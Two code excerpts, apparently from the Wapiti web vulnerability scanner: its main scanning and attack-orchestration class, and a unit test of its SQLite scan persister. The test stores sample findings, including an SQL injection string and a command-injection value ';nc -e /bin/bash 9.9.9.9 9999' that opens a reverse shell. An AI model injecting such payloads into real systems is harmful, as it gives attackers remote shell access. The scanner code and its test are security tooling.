Example #1
0
class Wapiti:
    """This class parse the options from the command line and set the modules and the HTTP engine accordingly.
    Launch wapiti without arguments or with the "-h" option for more informations."""

    REPORT_DIR = "report"
    HOME_DIR = os.getenv("HOME") or os.getenv("USERPROFILE")
    COPY_REPORT_DIR = os.path.join(HOME_DIR, ".wapiti", "generated_report")

    def __init__(self, root_url, scope="folder"):
        self.target_url = root_url
        self.server = urlparse(root_url).netloc
        self.crawler = crawler.Crawler(root_url)

        self.target_scope = scope
        if scope == "page":
            self.crawler.scope = crawler.Scope.PAGE
        elif scope == "folder":
            self.crawler.scope = crawler.Scope.FOLDER
        elif scope == "domain":
            self.crawler.scope = crawler.Scope.DOMAIN
        else:
            self.crawler.scope = crawler.Scope.URL

        self.report_gen = None
        self.report_generator_type = "html"
        self.xml_rep_gen_parser = ReportGeneratorsXMLParser()
        self.xml_rep_gen_parser.parse(
            os.path.join(CONF_DIR, "config", "reports", "generators.xml"))
        self.output_file = ""

        self.urls = []
        self.forms = []
        self.attacks = []

        self.color = 0
        self.verbose = 0
        self.module_options = None
        self.attack_options = {}
        self._start_urls = deque([self.target_url])
        self._excluded_urls = []
        self._bad_params = set()
        self._max_depth = 40
        self._max_links_per_page = -1
        self._max_files_per_dir = 0
        self._scan_force = "normal"
        self._max_scan_time = 0
        history_file = os.path.join(
            SqlitePersister.CRAWLER_DATA_DIR, "{}_{}_{}.db".format(
                self.server.replace(':', '_'), self.target_scope,
                md5(root_url.encode(errors="replace")).hexdigest()[:8]))
        self._bug_report = True

        self.persister = SqlitePersister(history_file)

    def __init_report(self):
        for rep_gen_info in self.xml_rep_gen_parser.get_report_generators():
            if self.report_generator_type.lower() == rep_gen_info.get_key():
                self.report_gen = rep_gen_info.create_instance()

                self.report_gen.set_report_info(self.target_url,
                                                self.target_scope, gmtime(),
                                                WAPITI_VERSION)
                break

        vuln_xml_parser = VulnerabilityXMLParser()
        vuln_xml_parser.parse(
            os.path.join(CONF_DIR, "config", "vulnerabilities",
                         "vulnerabilities.xml"))
        for vul in vuln_xml_parser.get_vulnerabilities():
            self.report_gen.add_vulnerability_type(_(vul.get_name()),
                                                   _(vul.get_description()),
                                                   _(vul.get_solution()),
                                                   vul.get_references())

        anom_xml_parser = AnomalyXMLParser()
        anom_xml_parser.parse(
            os.path.join(CONF_DIR, "config", "vulnerabilities",
                         "anomalies.xml"))
        for anomaly in anom_xml_parser.get_anomalies():
            self.report_gen.add_anomaly_type(_(anomaly.get_name()),
                                             (anomaly.get_description()),
                                             _(anomaly.get_solution()),
                                             anomaly.get_references())

    def __init_attacks(self):
        self.__init_report()

        logger = ConsoleLogger()
        if self.color:
            logger.color = True

        print(_("[*] Loading modules:"))
        print("\t {0}".format(", ".join(attack.modules)))
        for mod_name in attack.modules:
            mod = import_module("wapitiCore.attack." + mod_name)
            mod_instance = getattr(mod, mod_name)(self.crawler, self.persister,
                                                  logger, self.attack_options)
            if hasattr(mod_instance, "set_timeout"):
                mod_instance.set_timeout(self.crawler.timeout)
            self.attacks.append(mod_instance)

            self.attacks.sort(key=attrgetter("PRIORITY"))

        for attack_module in self.attacks:
            attack_module.set_verbose(self.verbose)
            if self.color == 1:
                attack_module.set_color()

        # Custom list of modules was specified
        if self.module_options is not None:
            # First deactivate all modules
            for attack_module in self.attacks:
                attack_module.do_get = False
                attack_module.do_post = False

            opts = self.module_options.split(",")

            for opt in opts:
                if opt.strip() == "":
                    continue

                method = ""
                if opt.find(":") > 0:
                    module_name, method = opt.split(":", 1)
                else:
                    module_name = opt

                # deactivate some module options
                if module_name.startswith("-"):
                    module_name = module_name[1:]
                    if module_name == "all":
                        for attack_module in self.attacks:
                            if attack_module.name in attack.commons:
                                if method == "get" or method == "":
                                    attack_module.do_get = False
                                if method == "post" or method == "":
                                    attack_module.do_post = False
                    else:
                        found = False
                        for attack_module in self.attacks:
                            if attack_module.name == module_name:
                                found = True
                                if method == "get" or method == "":
                                    attack_module.do_get = False
                                if method == "post" or method == "":
                                    attack_module.do_post = False
                        if not found:
                            print(
                                _("[!] Unable to find a module named {0}").
                                format(module_name))

                # activate some module options
                else:
                    if module_name.startswith("+"):
                        module_name = module_name[1:]
                    if module_name == "all":
                        print(
                            _("[!] Keyword 'all' was removed for activation. Use 'common' and modules names instead."
                              ))
                    elif module_name == "common":
                        for attack_module in self.attacks:
                            if attack_module.name in attack.commons:
                                if method == "get" or method == "":
                                    attack_module.do_get = True
                                if method == "post" or method == "":
                                    attack_module.do_post = True
                    else:
                        found = False
                        for attack_module in self.attacks:
                            if attack_module.name == module_name:
                                found = True
                                if method == "get" or method == "":
                                    attack_module.do_get = True
                                if method == "post" or method == "":
                                    attack_module.do_post = True
                        if not found:
                            print(
                                _("[!] Unable to find a module named {0}").
                                format(module_name))

    def browse(self):
        """Extract hyperlinks and forms from the webpages found on the website"""
        for resource in self.persister.get_to_browse():
            self._start_urls.append(resource)
        for resource in self.persister.get_links():
            self._excluded_urls.append(resource)
        for resource in self.persister.get_forms():
            self._excluded_urls.append(resource)

        stopped = False

        explorer = crawler.Explorer(self.crawler)
        explorer.max_depth = self._max_depth
        explorer.max_files_per_dir = self._max_files_per_dir
        explorer.max_requests_per_depth = self._max_links_per_page
        explorer.forbidden_parameters = self._bad_params
        explorer.qs_limit = SCAN_FORCE_VALUES[self._scan_force]
        explorer.verbose = (self.verbose > 0)
        explorer.load_saved_state(self.persister.output_file[:-2] + "pkl")

        self.persister.set_root_url(self.target_url)
        start = datetime.utcnow()

        try:
            for resource in explorer.explore(self._start_urls,
                                             self._excluded_urls):
                # Browsed URLs are saved one at a time
                self.persister.add_request(resource)
                if (datetime.utcnow() -
                        start).total_seconds() > self._max_scan_time >= 1:
                    print(_("Max scan time was reached, stopping."))
                    break
        except KeyboardInterrupt:
            stopped = True

        print(_("[*] Saving scan state, please wait..."))

        # Not yet scanned URLs are all saved in one single time (bulk insert + final commit)
        self.persister.set_to_browse(self._start_urls)
        # Let's save explorer values (limits)
        explorer.save_state(self.persister.output_file[:-2] + "pkl")

        print('')
        print(_(" Note"))
        print("========")

        print(
            _("This scan has been saved in the file {0}").format(
                self.persister.output_file))
        if stopped:
            print(
                _("The scan will be resumed next time unless you pass the --skip-crawl option."
                  ))

    def attack(self):
        """Launch the attacks based on the preferences set by the command line"""
        self.__init_attacks()

        for attack_module in self.attacks:
            if attack_module.do_get is False and attack_module.do_post is False:
                continue

            print('')
            if attack_module.require:
                t = [
                    y.name for y in self.attacks
                    if y.name in attack_module.require and (
                        y.do_get or y.do_post)
                ]
                if attack_module.require != t:
                    print(
                        _("[!] Missing dependencies for module {0}:").format(
                            attack_module.name))
                    print("  {0}".format(",".join(
                        [y for y in attack_module.require if y not in t])))
                    continue
                else:
                    attack_module.load_require([
                        y for y in self.attacks
                        if y.name in attack_module.require
                    ])

            attack_module.log_green(_("[*] Launching module {0}"),
                                    attack_module.name)

            already_attacked = self.persister.count_attacked(
                attack_module.name)
            if already_attacked:
                attack_module.log_green(
                    _("[*] {0} pages were previously attacked and will be skipped"
                      ), already_attacked)

            generator = attack_module.attack()

            answer = "0"
            skipped = 0
            while True:
                try:
                    original_request_or_exception = next(generator)
                    if isinstance(original_request_or_exception,
                                  BaseException):
                        raise original_request_or_exception
                except KeyboardInterrupt as exception:
                    print('')
                    print(_("Attack process was interrupted. Do you want to:"))
                    print(
                        _("\t1) stop everything here and generate the report"))
                    print(_("\t2) move to the next attack module (if any)"))
                    print(
                        _("\t3) stop everything here without generating the report"
                          ))
                    print(_("\t4) continue the current attack"))

                    while True:
                        answer = input("? ").strip()
                        if answer not in ("1", "2", "3", "4"):
                            print(
                                _("Invalid choice. Valid choices are 1, 2, 3 and 4."
                                  ))
                        else:
                            break

                    if answer in ("1", "2"):
                        break
                    elif answer == "4":
                        continue
                    else:
                        # if answer is 3, raise KeyboardInterrupt and it will stop cleanly
                        raise exception
                except (ConnectionError, Timeout):
                    sleep(.5)
                    skipped += 1
                    continue
                except StopIteration:
                    break
                except Exception as exception:
                    # Catch every possible exceptions and print it
                    tb = sys.exc_info()[2]
                    print(exception.__class__.__name__, exception)
                    print_tb(tb)

                    if self._bug_report:
                        traceback_file = str(uuid1())
                        with open(traceback_file, "w") as fd:
                            print_tb(tb, file=fd)
                            print("{}: {}".format(exception.__class__.__name__,
                                                  exception),
                                  file=fd)
                            print("Occurred in {} on {}".format(
                                attack_module.name, self.target_url),
                                  file=fd)
                            print("{}. Requests {}. OS {}".format(
                                WAPITI_VERSION, requests.__version__,
                                sys.platform))

                        try:
                            upload_request = Request(
                                "https://wapiti3.ovh/upload.php",
                                file_params=[[
                                    "crash_report",
                                    [
                                        traceback_file,
                                        open(traceback_file, "rb").read()
                                    ]
                                ]])
                            page = self.crawler.send(upload_request)
                            print(
                                _("Sending crash report {} ... {}").format(
                                    traceback_file, page.content))
                        except RequestException:
                            print(_("Error sending crash report"))
                        os.unlink(traceback_file)
                else:
                    if original_request_or_exception and original_request_or_exception.path_id is not None:
                        self.persister.set_attacked(
                            original_request_or_exception.path_id,
                            attack_module.name)

            if skipped:
                print(
                    _("{} requests were skipped due to network issues").format(
                        skipped))

            if answer == "1":
                break

        # if self.crawler.get_uploads():
        #     print('')
        #     print(_("Upload scripts found:"))
        #     print("----------------------")
        #     for upload_form in self.crawler.get_uploads():
        #         print(upload_form)
        if not self.output_file:
            if self.report_generator_type == "html":
                self.output_file = self.COPY_REPORT_DIR
            else:
                filename = "{}_{}".format(
                    self.server.replace(":", "_"),
                    strftime("%m%d%Y_%H%M", self.report_gen.scan_date))
                if self.report_generator_type == "txt":
                    extension = ".txt"
                elif self.report_generator_type == "json":
                    extension = ".json"
                else:
                    extension = ".xml"
                self.output_file = filename + extension

        for payload in self.persister.get_payloads():
            if payload.type == "vulnerability":
                self.report_gen.add_vulnerability(category=payload.category,
                                                  level=payload.level,
                                                  request=payload.evil_request,
                                                  parameter=payload.parameter,
                                                  info=payload.info)
            elif payload.type == "anomaly":
                self.report_gen.add_anomaly(category=payload.category,
                                            level=payload.level,
                                            request=payload.evil_request,
                                            parameter=payload.parameter,
                                            info=payload.info)

        self.report_gen.generate_report(self.output_file)
        print('')
        print(_("Report"))
        print("------")
        print(
            _("A report has been generated in the file {0}").format(
                self.output_file))
        if self.report_generator_type == "html":
            print(
                _("Open {0} with a browser to see this report.").format(
                    self.report_gen.final_path))
        # if self.http_engine.sslErrorOccured:
        #     print('')
        #     print(_("Warning: Wapiti came across some SSL errors during the scan, it maybe missed some webpages."))

    def set_timeout(self, timeout: float = 6.0):
        """Set the timeout for the time waiting for a HTTP response"""
        self.crawler.timeout = timeout

    def set_verify_ssl(self, verify: bool = False):
        """Set whether SSL must be verified."""
        self.crawler.secure = verify

    def set_proxy(self, proxy: str = ""):
        """Set a proxy to use for HTTP requests."""
        self.crawler.set_proxy(proxy)

    def add_start_url(self, url: str):
        """Specify an URL to start the scan with. Can be called several times."""
        self._start_urls.append(url)

    def add_excluded_url(self, url_or_pattern: str):
        """Specify an URL to exclude from the scan. Can be called several times."""
        self._excluded_urls.append(url_or_pattern)

    def set_cookie_file(self, cookie: str):
        """Load session data from a cookie file"""
        if os.path.isfile(cookie):
            jc = jsoncookie.JsonCookie()
            jc.open(cookie)
            cookiejar = jc.cookiejar(self.server)
            jc.close()
            self.crawler.session_cookies = cookiejar

    def set_auth_credentials(self, auth_basic: tuple):
        """Set credentials to use if the website require an authentication."""
        self.crawler.credentials = auth_basic

    def set_auth_type(self, auth_method: str):
        """Set the authentication method to use."""
        self.crawler.auth_method = auth_method

    def add_bad_param(self, param_name: str):
        """Exclude a parameter from an url (urls with this parameter will be
        modified. This function can be call several times"""
        self._bad_params.add(param_name)

    def set_max_depth(self, limit: int):
        """Set how deep the scanner should explore the website"""
        self._max_depth = limit

    def set_max_links_per_page(self, limit: int):
        self._max_links_per_page = limit

    def set_max_files_per_dir(self, limit: int):
        self._max_files_per_dir = limit

    def set_scan_force(self, force: str):
        self._scan_force = force

    def set_max_scan_time(self, minutes: float):
        self._max_scan_time = minutes * 60

    def set_color(self):
        """Put colors in the console output (terminal must support colors)"""
        self.color = 1

    def verbosity(self, vb: int):
        """Define the level of verbosity of the output."""
        self.verbose = vb

    def set_bug_reporting(self, value: bool):
        self._bug_report = value

    def set_attack_options(self, options: dict = None):
        self.attack_options = options if isinstance(options, dict) else {}

    def set_modules(self, options=""):
        """Activate or deactivate (default) all attacks"""
        self.module_options = options

    def set_report_generator_type(self, report_type="xml"):
        """Set the format of the generated report. Can be xml, html of txt"""
        self.report_generator_type = report_type

    def set_output_file(self, output_file: str):
        """Set the filename where the report will be written"""
        self.output_file = output_file

    def add_custom_header(self, key: str, value: str):
        self.crawler.add_custom_header(key, value)

    def flush_attacks(self):
        self.persister.flush_attacks()

    def flush_session(self):
        self.persister.flush_session()
        try:
            os.unlink(self.persister.output_file[:-2] + "pkl")
        except FileNotFoundError:
            pass

    def count_resources(self) -> int:
        return self.persister.count_paths()

    def has_scan_started(self) -> bool:
        return self.persister.has_scan_started()

    def have_attacks_started(self) -> bool:
        return self.persister.have_attacks_started()
Example #2
0
async def test_persister_basic():
    url = "http://httpbin.org/?k=v"
    respx.get(url).mock(return_value=httpx.Response(200, text="Hello world!"))

    crawler = AsyncCrawler("http://httpbin.org/")

    try:
        os.unlink("/tmp/crawl.db")
    except FileNotFoundError:
        pass

    persister = SqlitePersister("/tmp/crawl.db")
    persister.set_root_url("http://httpbin.org/")

    simple_get = Request("http://httpbin.org/?k=v")

    simple_post = Request(
        "http://httpbin.org/post?var1=a&var2=b",
        post_params=[["post1", "c"], ["post2", "d"]]
    )
    persister.set_to_browse([simple_get, simple_post])

    assert persister.get_root_url() == "http://httpbin.org/"
    assert persister.count_paths() == 2
    assert not len(list(persister.get_links()))
    assert not len(list(persister.get_forms()))
    assert not len(list(persister.get_payloads()))

    stored_requests = set(persister.get_to_browse())
    assert simple_get in stored_requests
    assert simple_post in stored_requests

    # If there is some requests stored then it means scan was started
    assert persister.has_scan_started()
    assert not persister.has_scan_finished()
    assert not persister.have_attacks_started()

    for req in stored_requests:
        if req == simple_get:
            await crawler.async_send(req)
            # Add the sent request
            persister.add_request(req)
            assert req.path_id == 1
            assert persister.get_path_by_id(1) == req
            break

    # Should be one now as the link was crawled
    assert len(list(persister.get_links())) == 1
    # We still have two entries in paths though as the resource just got updated
    assert persister.count_paths() == 2

    persister.set_attacked(1, "xss")
    assert persister.count_attacked("xss") == 1
    assert persister.have_attacks_started()

    naughty_get = Request("http://httpbin.org/?k=1%20%OR%200")
    persister.add_vulnerability(1, "SQL Injection", 1, naughty_get, "k", "OR bypass")
    assert next(persister.get_payloads())
    persister.flush_attacks()
    assert not persister.have_attacks_started()
    assert not len(list(persister.get_payloads()))
    persister.flush_session()
    assert not persister.count_paths()

    naughty_post = Request(
        "http://httpbin.org/post?var1=a&var2=b",
        post_params=[["post1", "c"], ["post2", ";nc -e /bin/bash 9.9.9.9 9999"]]
    )
    persister.add_vulnerability(1, "Command Execution", 1, naughty_post, "post2", ";nc -e /bin/bash 9.9.9.9 9999")
    payload = next(persister.get_payloads())
    persister.close()
    assert naughty_post == payload.evil_request
    assert payload.parameter == "post2"
    await crawler.close()